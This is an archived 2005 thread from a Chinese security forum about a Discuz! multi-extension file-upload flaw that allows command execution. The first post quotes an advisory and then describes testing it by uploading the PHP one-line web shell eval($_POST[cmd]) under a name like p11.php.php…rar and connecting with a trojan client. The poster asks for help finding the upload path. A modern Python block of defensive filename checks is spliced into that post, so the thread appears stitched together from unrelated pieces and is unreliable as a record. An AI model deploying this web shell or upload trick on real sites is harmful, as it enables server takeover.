Evil Octal Information Security Team Technical Discussion Group's Archiver

k4u 2005-8-19 14:26

[Repost] Obtaining the Discuz attachment download path, and the multi-extension RAR arbitrary command execution vulnerability

Source: Evil Octal Information Security Team ([url]www.eviloctal.com[/url])

Discuz! - "popular web forum applications in China".

Due to an input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.
  
Credit:
The information has been provided by SSR Team.  
  
Details
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior

Discuz! doesn't properly check multiple extensions of uploaded files, allowing malicious attackers to upload a file with multiple extensions such as attach.php.php.php.php.rar to a web server.

This can be exploited to run arbitrary commands with the privilege of the HTTPD process, which is typically run as the nobody user.

Workaround:
Exclude the RAR extension from the extension list for attached files on an administration page and wait for the release of the official patch.

Disclosure Timeline:
* 24.07.05 - Vulnerability found
* 25.07.05 - Vendor notified
* 12.08.05 - Official release  

This is the vulnerability advisory I saw on the [url]http://www.securiteam.com/unixfocus/5WP0F1FGKG.html[/url] site.
I immediately tested it locally, and it turns out arbitrary commands can be executed: I saved <?php eval($_POST[cmd]);?>
as cmd.php, then packed it as p11.php.php.php.php.php.php.php.php.php.php.php.php.rar
and uploaded it to the database; it was renamed to p11.php.php.php.php.php.php.php.php.php.php.php.php_6nOXtmZPWv90.rar.
You can see the file name has been changed, but you can't see this new file name yourself, so you don't have the path either.
Neither packet capture nor sniffing reveals the file path. Then I went into the admin backend, attachment management, where the file name can be seen, and used the lanker trojan client
to connect and execute commands. The hard part is how to get the path of the uploaded file; I tried for a long time last night and couldn't get the path.
I've come to EST before, but mostly lurked; now I finally have a question to ask. I'm a newbie, asking for help here.
Vulnerable Systems:
* Discuz! version 4.0.0 rc4 and prior. The vulnerability is very widespread, and Discuz's anti-hotlinking is also good,
so exploiting it really isn't something a newbie like me can pull off. Still studying the code.
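A defender's view of the filename check at the root of this advisory, as an added example in Python (not Discuz's own code): a "last extension only" check beside a hardened one that treats every dot-separated segment as an extension, plus a hypothetical stem-preserving rename modelled on the renamed file observed above versus an opaque storage name. The allowlist and script-extension sets are constructed sample values, and the Apache multi-extension model is an assumption about a typical mod_php setup.

```python
import re
import secrets

# Constructed sample allowlist, like the per-type attachment extension list an
# administrator configures (the workaround above removes "rar" from it).
ALLOWED_EXTENSIONS = {"jpg", "gif", "png", "zip", "rar"}
# Extensions a typical mod_php setup maps to the PHP handler (assumption). With
# Apache's multi-extension handling, a match on any dot-separated segment counts.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml"}

def _segments(filename):
    """Lower-cased dot-separated parts of the basename, path prefix stripped."""
    return re.split(r"[\\/]", filename)[-1].lower().split(".")

def weak_check(filename):
    """Bug class from the advisory: only the final extension is compared with
    the allowlist, so 'x.php.php.rar' passes because it ends in .rar."""
    parts = _segments(filename)
    return len(parts) > 1 and parts[-1] in ALLOWED_EXTENSIONS

def handler_would_run(stored_name):
    """Model of Apache multi-extension behaviour: the PHP handler applies if
    any extension segment of the stored name is a script extension."""
    return any(p in SCRIPT_EXTENSIONS for p in _segments(stored_name)[1:])

def stem_preserving_rename(filename):
    """Hypothetical rename that keeps the user-supplied stem and appends a
    random tag before the last extension, like the stored name seen above.
    The embedded .php segments survive, so the handler still matches."""
    stem, ext = filename.rsplit(".", 1)
    return "%s_%s.%s" % (stem, secrets.token_urlsafe(9), ext)

def strict_check(filename):
    """Hardened check: the last extension must be allowlisted AND no segment
    may be a script extension, so multi-extension names are rejected."""
    parts = _segments(filename)
    if len(parts) < 2 or parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(p in SCRIPT_EXTENSIONS for p in parts[1:])

def safe_stored_name(filename):
    """Hardened storage name: opaque random stem plus the validated extension,
    so nothing user-controlled survives into the on-disk name."""
    if not strict_check(filename):
        raise ValueError("rejected upload name: %r" % filename)
    return "%s.%s" % (secrets.token_hex(8), _segments(filename)[-1])
```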

bbbbb 2005-10-23 21:06

[quote][b]The following is quoted from the post by k4u on 2005-08-19 14:26, [Repost] Obtaining the Discuz attachment download path, and the multi-extension RAR arbitrary command execution vulnerability:[/b]
Source: Evil Octal Information Security Team ([url]www.eviloctal.com[/url])

Discuz! - "popular web forum applications in China".

Due to an input validation flaw, malicious attackers can cause the Discuz program to run arbitrary commands with the privilege of the HTTPD process.
.......[/quote]
44444

饿死对立法 2005-11-22 00:29

This vulnerability is too much trouble; you only get Httpd privileges, it'll wear you out.

hack988 2006-11-14 19:40

For this one, it seems you can only guess.

© 1999-2008 EvilOctal Security Team